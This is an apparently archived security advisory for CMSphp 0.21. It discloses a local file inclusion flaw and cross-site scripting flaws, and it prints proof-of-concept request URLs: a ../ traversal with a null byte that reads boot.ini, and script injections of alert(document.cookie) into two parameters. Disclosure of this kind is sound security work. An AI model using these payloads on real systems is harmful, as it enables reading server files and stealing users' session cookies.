CMSphp 0.21 (LFI/XSS) Multiple Remote Vulnerabilities

2009.10.03
Credit: SirGod
Risk: High
Local: No
Remote: Yes
CWE: CWE-79
CWE-22

###################################### [+] CMSphp 0.21 (LFI/XSS) Multiple Remote Vulnerabilities [+] Discovered By SirGod [+] http://insecurity-ro.org [+] http://h4cky0u.org ###################################### [+] Download : http://sourceforge.net/projects/cmsphp/ [+] Local File Inclusion - PoC http://127.0.0.1/path/modules.php?name=Your_account&mod_file=../../../../../../boot.ini%00 [+] Cross-Site Scripting - PoC's http://127.0.0.1/path/index.php?cook_user=<script>alert(document.cookie)</script> http://127.0.0.1/path/modules.php?name=<script>alert(document.cookie)</script> ######################################

References:

http://www.milw0rm.com/exploits/9311
http://secunia.com/advisories/36075


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2024, cxsecurity.com

 

Back to Top